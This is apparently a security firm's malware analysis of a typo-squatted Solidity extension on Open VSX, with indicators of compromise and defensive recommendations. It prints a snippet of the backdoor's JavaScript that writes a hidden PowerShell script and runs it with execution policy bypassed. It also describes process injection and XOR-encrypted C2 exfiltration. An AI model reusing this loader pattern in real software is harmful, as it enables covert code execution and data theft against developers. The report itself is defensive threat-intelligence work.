WhiteCobra Beginnings
Background
With Microsoft forcibly restricting all non‑Microsoft builds of Visual Studio Code from using its proprietary extension marketplace, forks like Cursor, VSCodium, Windsurf, Gitpod, and others have been forced to rely on Open VSX, a community‑run alternative that simply lacks Microsoft’s vetting, code‑signing, impersonation checks, publisher badges, or dynamic malware scanning.
That gap isn’t theoretical. In July 2025, a malicious “Solidity Language” extension in the Open VSX registry was used to quietly install RATs and credential-stealing malware in the Cursor IDE and siphoned $500,000 worth of crypto from one developer. Fake download counts and manipulated rankings made it appear more legitimate than the real plugin while the victim had no idea until it was too late.
One technique these threat actors often use is called typo-squatting, which entails creating extensions with names that are common misspellings of legitimate ones. A single mistyped search can expose developers to theft of funds, data exfiltration, or full system compromise.
To fight this, the Yeeth Security group built an extension scanning pipeline and dev-guard as a proof of concept. This extension is a tool is designed to be actively updated to alert against new threats in extension registries, alerting developers before they can harm the wider community. This is just the beginning of the wider tooling which can be created to support and protect developers from these new threats.
What follows is a case study of a malicious extension detected with Dev Guard scanners, an example of how easily threat actors can exploit gaps in your system from just one click within Cursor extension marketplace.
Summary
On August 29, 2025 Yeeth Security’s automated scanners flagged a malicious extension uploaded to the Open VSX Registry. The scanner alerted that the extension performs unauthorized code execution and contained Command and Control (C2) communication capabilities. Upon manual analysis, the extension was confirmed to be a backdoor.
Description
The extension NomcFoundation.hardhat-solidity-1.2.5.vsx contains the malicious file Optimizer.js under the /out/network directory. While most of the files in the package behaved normally, Optimizer.js functions as a backdoor that collects system related information, performs network communication with a C2, and executes shellcode via process injection. The backdoor is also intended to be run in either Windows or MacOS.
Capabilities
Process Injection: Leverages Windows Early Bird Injection to inject and execute a payload within werfault.exe.
PowerShell Execution: Generates and executes a PowerShell script (hardhat-optimize.ps1) that is responsible for the process injection and payload execution. The file is deleted after a 10 second delay. The following is a snippet of the temporary file creation and PowerShell execution:
targetProcess = "C:\\Windows\\System32\\werfault.exe";
const psScript = ` $process = Start-Process -FilePath "${targetProcess}" -ArgumentList "-u -p" -PassThru -WindowStyle Hidden
Start-Sleep -Milliseconds 500
Start-Sleep -Milliseconds 1000
$process | Stop-Process -Force
`;
const tempScript = path.join(os.tmpdir(), `hardhat-optimize.ps1`);
fs.writeFileSync(tempScript, psScript);
child_process.exec(`powershell -ExecutionPolicy Bypass -File "${tempScript}"`, {
windowsHide: true
}, () => { });
System Telemetry Collection: Gathers system information, including the operating system, architecture, total memory, CPU count, and system uptime.
Encrypted Command and Control (C2) Traffic: Uses a hard-coded XOR key to decrypt the C2 domain. The backdoor connects to the domains path /api/telemetry for data exfiltration. A dynamic key may also be generated for C2 communication by hashing a seed composed of the string “hardhat-network-“, the system hostname, and a timestamp.
Host-Based Indicators
File Hashes
-
Extension
MD5:129432CA4BE6A26A3F05FB47AF744A7C
SHA-256:1CAA42136007D6C1ED479A759965F5AEBA64FC79C28BF9D5F42CD3EBF9E4C40E
Name:NomcFoundation.hardhat-solidity-1.2.5 -
Malicious Javascript
MD5:1BF898D9C6B4F6642600C45A0DD15750
SHA-256:3DDBBC25F1F8BA6C7A49F42971DC0DEC3CD43F2A4C8F2757A7697BF2FF70C9CA
Verification Keys
Windows
- [0, 170, 6, 48, 142, 49, 188, 137, 187, 115, 123, 119, 18, 120, 175, 117, 98, 126, 68, 241, 199, 101, 47, 46, 120, 171, 105, 215, 98, 111, 59, 65]
- [92, 114, 67, 86, 145, 18, 203, 25, 54, 16, 213, 146, 133, 149, 86, 158, 131, 162, 65, 92, 240, 92, 226, 3, 165, 99, 107, 118, 161, 88, 55, 211]
- [149, 94, 246, 38, 124, 222, 214, 73, 107, 157, 204, 25, 134, 50, 123, 19, 98, 154, 117, 147, 203, 37, 17, 12, 143, 251, 248, 225, 150, 82, 81, 57]
MacOS
- [0, 170, 6, 48, 142, 49, 188, 137, 187, 115, 123, 119, 18, 120, 175, 117, 98, 126, 68, 241, 199, 101, 47, 46, 120, 171, 105, 215, 98, 111, 59, 65]
- [92, 114, 67, 86, 145, 18, 203, 25, 54, 16, 213, 146, 133, 149, 86, 158, 131, 162, 65, 92, 240, 92, 226, 3, 165, 99, 107, 118, 161, 88, 55, 211]
- [149, 94, 246, 38, 124, 222, 214, 73, 107, 157, 204, 25, 134, 50, 123, 19, 98, 154, 117, 147, 203, 37, 17, 12, 143, 251, 248, 225, 150, 82, 81, 57]
Network-Based Indicators
- Encrypted Domain:
0x8d, 0x9e, 0xaf, 0xb0, 0xc1, 0xd2, 0xe3, 0xf4, 0x05, 0x16, 0x27, 0x38, 0x49, 0x5a, 0x6b, 0x7c- XOR Key:
0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6a, 0x6b, 0x6c, 0x6d, 0x6e, 0x6f, 0x70
- XOR Key:
- User-Agent:
Hardhat-Solidity-Extension/1.2.4
Recommendations:
Ensure your endpoint detection and response (EDR) systems are not only updated with the indicators identified in this report, but also tuned to flag suspicious behaviors common to malicious extensions such as unusual network traffic, unauthorized credential access, or persistence mechanisms. Regular validation of detection rules and proactive threat hunting can help catch variants that evolve beyond known indicators.
Defense shouldn’t stop there — the dev-guard extension, built and maintained by the Yeeth Security team, adds a crucial layer of protection for VS Code and Cursor AI users. By continuously monitoring new campaigns and pushing live updates, dev-guard helps shut down these threats before they can spread across the developer community.